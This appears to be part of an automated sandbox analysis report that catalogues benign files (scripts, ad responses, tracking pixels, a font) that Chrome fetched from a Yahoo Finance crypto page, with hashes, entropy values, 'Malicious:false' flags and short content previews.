                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:JKKGJND4kQ9dSO6E+sl1XSDQkQSYRSYWu6jlqDq:JKtp4r3OEjl1iUkQ/R9r6jkDq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:099085B6CCBD78C30B4A6592F26BDEF5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EA16F2988D321483258B007F98B65147CA443185
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:16FB6CCC8FF4F296025F19775F4117BC49F3196C6322BDAB5465A4EACEF2506E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8E1EA425A4F78366FBB68964BF355C49D189D026D4F42BD7C8B619AC9412CEDA652B0183D508D76DB39793A5ED2EB01A077A60A1F8B39C078345D6870C2B7363
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{a1 as x,a2 as f}from"./scheduler.Dr9AAxFe.js";function h(t){const r=t-1;return r*r*r+1}function v(t){return t/=.5,t<1?.5*t*t:(t--,-.5*(t*(t-2)-1))}function F(t,{delay:r=0,duration:p=400,easing:c=x}={}){const s=+getComputedStyle(t).opacity;return{delay:r,duration:p,easing:c,css:a=>`opacity: ${a*s}`}}function w(t,{delay:r=0,duration:p=400,easing:c=h,x:s=0,y:a=0,opacity:l=0}={}){const i=getComputedStyle(t),d=+i.opacity,n=i.transform==="none"?"":i.transform,e=d*(1-l),[u,y]=f(s),[_,m]=f(a);return{delay:r,duration:p,easing:c,css:($,g)=>`....transform: ${n} translate(${(1-$)*u}${y}, ${(1-$)*_}${m});....opacity: ${d-e*g}`}}function C(t,{delay:r=0,duration:p=400,easing:c=h,axis:s="y"}={}){const a=getComputedStyle(t),l=+a.opacity,i=s==="y"?"height":"width",d=parseFloat(a[i]),n=s==="y"?["top","bottom"]:["left","right"],e=n.map(o=>`${o[0].toUpperCase()}${o.slice(1)}`),u=parseFloat(a[`padding${e[0]}`]),y=parseFloat(a[`padding${e[1]}`]),_=parseFloat(a[`margin${e[0]}`]),m=parseFloat(a[`margin$
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):33190
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.834978231190411
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:0eUACPGrCB3Sxq4G23q0ADnDlk3JQyurOLyjB8uPO84sKIoyAbS:R3Mf8ur+bS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D3BF2D1049765F3E882831FEBF995CA1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:AEC07AAC52E74B1360F68791B58FEFFEECEC86B0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:7586764EA0AB79830891FCE5A31A85EB3AE970D803563C4684A9A6BE417830F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5EEBB3B7D5CBC0433B9CAE1349561477A2027599A82D64F54E19B634EB31817B349A2F0CE18A4F46D4ABA65032802173905781F7C8E9CDB78F093AB3CEC446CA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://securepubads.g.doubleclick.net/gampad/ads?pvsid=1039632299103059&correlator=668732469571714&eid=44809527%2C31085776&output=ldjh&gdfp_req=1&vrg=202410030101&ptt=17&impl=fifs&gdpr=0&us_privacy=1YNN&gpp_sid=-1&iu_parts=22888152279%2Cus%2Cyfin%2Cscreen%2Cdt%2Cus_yfin_screen_dt_top_center&enc_prev_ius=%2F0%2F1%2F2%2F3%2F4%2F5&prev_iu_szs=728x90&ifi=3&sfv=1-0-40&fsfs=1&fsbs=1&rcs=1&eri=5&sc=1&cookie_enabled=1&abxe=1&dt=1728414943565&adxs=276&adys=24&biw=1280&bih=907&scr_x=0&scr_y=0&btvi=0&ucis=2&oid=2&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&u_tz=-240&dmc=8&bc=31&nvt=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&url=https%3A%2F%2Ffinance.yahoo.com%2Fmarkets%2Fcrypto%2Fall%2F&vis=1&psz=1280x907&msz=1280x138&fws=0&ohw=0&td=1&egid=22304&topics=1&tps=1&htps=10&a3p=Eh0KDmxpdmVpbnRlbnQuY29tGNOduOymMkgAUgIIbw..&nt=1&psd=WzE1LFtdLG51bGwsM10.&dlt=1728414837073&idt=39349&prev_scp=loc%3Dtop_center%26ri%3D2%26ay_floor_s%3Dfloors%2520set%26hb_pb100%3Dfalse%26hb_adid%3D66539ffa717f139%26hb_source%3Ds2s%26hb_size%3D728x90%26hb_pb%3D0.46%26hb_format%3Dbanner%26hb_cache_path%3D%252Fcache%26hb_bidder_seatid%3DOpenX%26hb_bidder%3Dopenx%26hb_adomain%3Dt-mobile.com%26ay_floor%3D0.46%26ay_floor_m%3Dm_0.2&cust_params=ay_floor_g%3Doptimize%26ay_floor_m%3Dm_0.2%26ay_floor_s%3Dmodel%2520not%2520loaded%26abk%3D0%26bucket%3Drocket_GA_desk_test-3-v1%252Cypf-bankrate-widget-control-v2-q4%252Cyf-portfoliodetail-control%252Cyf-smartasset-msg-a%252Cypf-new-article-template-release-exp-v2%26cobrand%3Dnone%26colo%3Dir2%26device%3Ddesktop%26lang%3Den-US%26lu%3D0%26region%3DUS%26site%3Dfinance%26ver%3Dnimbus%26usercountry%3DUS%26hashtag%3Dcrypto%26pct%3Dscreener%26pg_name%3Dall%26pt%3Dutility%26spaceid%3D1183331958%26bka%3D0%26hb_uid_mod%3Dliveintentid_on_not_enriched%26li-module-enabled%3Dt1-e0%26lr_env%3Dno-id&adks=4039402601&frm=20&eoidce=1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"/22888152279/us/yfin/screen/dt/us_yfin_screen_dt_top_center":["html",1,null,null,1,1,1,0,0,null,null,1,1,[["ID=1fa890f2e51c4d2d:T=1728414945:RT=1728414945:S=ALNI_MaOVNqsPyXCPxRo81N4gXsRifDQDg",1762110945,"/","yahoo.com",1],["UID=00000f31c50e555a:T=1728414945:RT=1728414945:S=ALNI_MaB9wbUuQe1OLz4fdrDzqNPSa5iEw",1762110945,"/","yahoo.com",2]],[138467550613],[6636161008],[5462617191],[3473808467],null,null,null,null,null,null,null,1,null,null,null,null,null,null,"AOrYGsliMxOWc3vsBPxIz08XoQ66kSTdR7Y4gLDovVwdtQEdETrXIWOgfQXzLswNo6RPE3-WpwprKU4r4hOmSX7AU9cE7cpgswBJ4g4tKT994wCoRHxg","CMuh_ba__4gDFSeLgwcd7KUoig",null,null,null,null,null,null,null,null,null,null,null,null,null,null,"2",null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,[["ID=8034483c3c2d8c02:T=1728414945:RT=1728414945:S=AA-AfjZ6Kt3K9atddi4obLlZBKCh",1743966945,"/","yahoo.com"]],[]]}.<!doctype html><html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):17082
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.0179023358191515
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:B/7A5kMiVO5dDx278R7sIl4J+KNcou69slOL3TPanN3q1:BDsdiVOfxCmOJJfLruN+
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E5F9FF7C99B9963D29ECFD4F6F3FEEA4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FD891E36864188C00B24F4A7162E3FD6F23E983E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4A23A844C4B743C75E7E835586808D3254B0290383441257C917FC834452E788
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7CE34B958DF8D5050CB3C4CE886BF3869CD766D27488B5B7F79860466D2FCA58D057BD75D338BACB599EF3F2C552091BD5B57D4BA444463F5595BEB6243CD39C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"sodar_query_id":"v4QFZ67GK7-SjuwPiJP9kAE","injector_basename":"sodar2","bg_hash_basename":"OLU2Qs7L6j7GM-qga8AmcQGkif1_HTGLtucCbK--hhY","bg_binary":"BGTWUsKxsvZOeHdRtuNBjYL+rG2NcCIkNd8fiYjxG4O/vFflkKxHPzKYSrF1kgI5vPs8xpSPJi09VTHmanb7tpMRSEQ7iE+LuQTdq6qtiMLezeb7EL7Dc8OhvGpOwaPl6a2CyMDxPodd3sHS9SLaeJ/J5EmIzGcWV/9c26kJQigIzMSzkSqeZQeT9ydVD/ol2Atj2F4SRyRqoYxx08uI61e/9iDPgGYXXVVGgmMIqGDgVpQ4NNNqNZhkYgIhKL5WAS5IXf6NI4NmgLlPC23THNlcuiUrOrmP/GqrnPnT2PlZtjogcV3B/wHJCGcQ1aoQnOuaEVHPL2Q/K7LX0GeqyVYfMITqlH8P08NjvpZ4bGDu5YSgLeGykWLpi9bK5pdQBeIGl2VSPonuvn3cMDZwe4Y6P6QscUYGqArobwYthaeSNPMPhEpb1vTnykOR1+MoX9LTGwdg0NbNt6Z3XOKZkFY/j1baz+aqkKPnwEcSnHzwxWe/o8K3v6AjCRbLABcl37z7zETXNY70n3deGJ2klubqaBW2LJg2/GRfsxYVaCIeiaU7Mvqk79I8DpBJEllyrIHrHQ9/uI8d8FQPnaZTJVlnV22iSfNI2n3sk+XuTiLpE5pN9m5gQKuAeX8y9Jo/3kqVEKbHGMRebT9d9p6zLXRn56FHaX3ImebtAshAqTw5OYSR4tOzyHlXrtCR7KDrCEhIdPNAsuCvEDYBRsedQ7rqLS4Kff/WNDRkDdrcnUayxhjV1iOfdtp/7hHYITreQL6g5DB5pv39/jn1ab76CxfwkFxlq6X1pPGLYe/BemweAZVMYqgg2VgYxJrudcAqgdLS81npnUmoady9P
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3343)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):301279
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.49270070124603
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3072:e2YbbFzCDhiFOqOX4JkkNPkoaeIyVX0iu/SX3k/pxDNbfCjgx0JBeJ6E:IbRYuvEiVX0ibkoE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:7CA4745FF9E2B26921FE4546D07C0191
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:74F662BDB6EBFE059D7F30D5F25D271D9C46B08D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:3CA08B3CA34C1FDEAF44A0E6E27AAE3C95A2CD6E19F8BA16A7331F26CC8B1B9C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:DC7C5EDF5FC3B6CF84414ACB4F8101172759A3398D78D2085BAFA3920AEB492E30D549C2B907C75E6039875624458AD1E97FC25B2F7190E385D8D5D1FFEDF7BB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.....var __IntegralASDiagnosticCall = (function() {..try {...var alreadySent = {};...return function(code, err, config) {....try {.....if (!__IASScope.isDomless) {......try {.......__IASScope.postMessage(........{.........code,.........name: 'jsdiag',.........origin: 'ias',........},........'*'.......);......} catch (_) {}.....}......var gen = function(code, err, config) {......var url = '//diag.adsafeprotected.com/js?';......try {.......var errMsg = err && err.message ? encodeURIComponent(err.message.replace(/ /g, '-')).substring(0, 200) : '';.......url += 'code:fwjs-diag-' + code;.......url += '&err:' + errMsg;.......url += '&codeanderr:' + code + '_' + errMsg;.......if (config) {................url += '&version:' + config.version || '';........url += '&server:' + config.mn || '';........url += '&region:' + config.region || '';........url += '&mode:' + config.mode || '';........url += '&forceAppend:' + config.forceAppend || '';........url += '&asid:' + config.asid || '';........url +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), CFF, length 58448, version 1.0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):58448
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.996586878132448
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:UkDg2Ywutyh7fPqnva9lX9MzIqEcrdVkgIC2SlulNArk/snzi:UwPYRoh7fPAv659GrHmlSUUBi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3C71D2DD717D40FEE3A59365ECA4A591
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:414D6092CADD1E498664FD138C33AA920C5D4999
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:05C5618D231B9BDB0AC571A5AE5AC3C8075732E546550C1AD0426365CD43B854
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CEB18E1E3CA74FAC398C5AD7328386061F5E833A199858C576B731A9AE499BFC3D515B796CEE66FD0DB09674EB1604AECDB4DEEC272F6F54BFEBAB702F45827C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/cv/apiv2/finance/fonts/GT-America-Condensed-Bold.woff2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:wOF2OTTO...P.......................................0..$...*....`..j.6.$.......a. [....*2....?..."%....._@.....f.p.}..T#7].8.."x.......5.D......m....|.....&&.p.R...>p..l.KS.........hS.y..S...Z..S.E.7..{k.o.....]KI%URe..RJ.......*..*........X..s..O9.k.....,"...........i.*...>(M|~Q$af...0.c.....k..ks.iH.P...R.G..+..z;0.z..k.....E..<s..ekWT...^..&.....Iq.....j.9j...c.a..ae.D.)..9?..........boZ.6..3..5?]8..t:..w.........7W.U..M...G?...O....O.(.............g.a!.Sd..c.cU...LI%;.../...........-.C+..{D.]?.*Op.{.g.....P"Z.X.#....?<?.s..a.(.9.+1*.P..=...I~..*...8..QM. u.:.h....Ntnf......&...dR.h#DH.Jc....E...\T...F+i...F.S.."6..X)V....`.x..m...bs6?.N....'..[.....q..p.4.....e..2..r.g.w_5..UF.....BB.....dDw.&.....j~....O..A.....2@=.........d<Z'.....tZ....T..V.l.B.....!.+.J..o.........C.B....+......a.aZZ...q)yi.....o.]..Q..%..R...m...0:rkX.....m,..u..F_.L...J.C...).,.e%.W....Z.......=./...%&........V.m.O4.c..X.(.m;.1Z5df..E.Oq...Vi..y+....!!/!@...TtYn.Lu.\F..(Fq.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (5773)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5774
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.326641152741979
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:Iotitk6L3rFAgGw7NXVkMk0Sk07xY09oGqbvhckGYc+jsk0Y59F05a9/ZlMVny8s:IoQGM36gt+7I2W09oGqbvhrGYc+jb0YN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:ABCBFF43126E7FAE972A2E57FFB0F004
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:64F27DE34929D3C33773EBE85597EE3D149B06E1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:00583B7EAB7F7E7FBA4871B8CC34625A2BC61314C5032BF13BDEC16CFE8A9196
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:68009B7DD9BABC6F2BC76A8084AD01FC18762F2FEDF28AF3250136DB28F3781321E692D512FAE40018EBAEA9E2A4F9F4A5453A6B2C12816E2F44DB4559F240EF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{q as t}from"./commonUtil.CI22_Irn.js";const E={ns:"markets"};var k=(e=>(e.OVERVIEW="overview",e.INDICES="world-indices",e.FUTURES="commodities",e.BONDS="bonds",e.CURRENCIES="currencies",e.OPTIONS="options",e.SECTORS="sectors",e.STOCKS="stocks",e.CRYPTO="crypto",e.ETF="etfs",e.MUTUALFUNDS="mutualfunds",e))(k||{});const R={stocks:"equity",crypto:"cryptocurrency",etfs:"etf"},I=e=>e==="stocks"||e==="crypto"||e==="etfs"?R[e]:"",g={overview:{id:"OVERVIEW",uri:t({category:"overview"})},stocks:{id:"STOCKS",fields:["ticker","symbol","longName","shortName","regularMarketPrice","regularMarketChange","regularMarketChangePercent","regularMarketVolume","averageDailyVolume3Month","marketCap","trailingPE","fiftyTwoWeekChangePercent","fiftyTwoWeekRange","regularMarketOpen","longName","sparkline"],scrIds:{"most-active":"MOST_ACTIVES",gainers:"DAY_GAINERS",losers:"DAY_LOSERS","52-week-gainers":"FIFTY_TWO_WK_GAINERS","52-week-losers":"FIFTY_TWO_WK_LOSERS"},tabs:["most-active","trending","gainers","
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (30186)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):32700
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.489965733482254
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:rsHz9jdA0KZbptvzF+D1+anaTNG3Bpqp2pnZNX6pJpvKHi6vp8BMoV3QMg4pd6h5:onKanaiNoVg5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:27E0A461EF1C5281C43AF95F2C333D1A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:CB0E02CCAB6E61D7F3178785825F84D34A0A9F16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E0C3F2F92332679D0089AF1E51A84ACED3E0693EE8EA3D88AA041B58870FD951
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:779FE22DB90B60E4BBF49306E8ABD12F604081BD4059D8045D47F49907DFFA0A8C4A05E2A8642AD4D322D9A1FE9BC6E78D3D324F547D02EB9892DAF253889499
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/server.CGBHKPKz.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:var Ct={},q={};q.byteLength=Lt;q.toByteArray=Mt;q.fromByteArray=Pt;var k=[],R=[],kt=typeof Uint8Array<"u"?Uint8Array:Array,H="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";for(var D=0,St=H.length;D<St;++D)k[D]=H[D],R[H.charCodeAt(D)]=D;R[45]=62;R[95]=63;function lt(c){var p=c.length;if(p%4>0)throw new Error("Invalid string. Length must be a multiple of 4");var a=c.indexOf("=");a===-1&&(a=p);var w=a===p?0:4-a%4;return[a,w]}function Lt(c){var p=lt(c),a=p[0],w=p[1];return(a+w)*3/4-w}function _t(c,p,a){return(p+a)*3/4-a}function Mt(c){var p,a=lt(c),w=a[0],y=a[1],f=new kt(_t(c,w,y)),h=0,o=y>0?w-4:w,x;for(x=0;x<o;x+=4)p=R[c.charCodeAt(x)]<<18|R[c.charCodeAt(x+1)]<<12|R[c.charCodeAt(x+2)]<<6|R[c.charCodeAt(x+3)],f[h++]=p>>16&255,f[h++]=p>>8&255,f[h++]=p&255;return y===2&&(p=R[c.charCodeAt(x)]<<2|R[c.charCodeAt(x+1)]>>4,f[h++]=p&255),y===1&&(p=R[c.charCodeAt(x)]<<10|R[c.charCodeAt(x+1)]<<4|R[c.charCodeAt(x+2)]>>2,f[h++]=p>>8&255,f[h++]=p&255),f}function Nt(c){return k[c>>18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
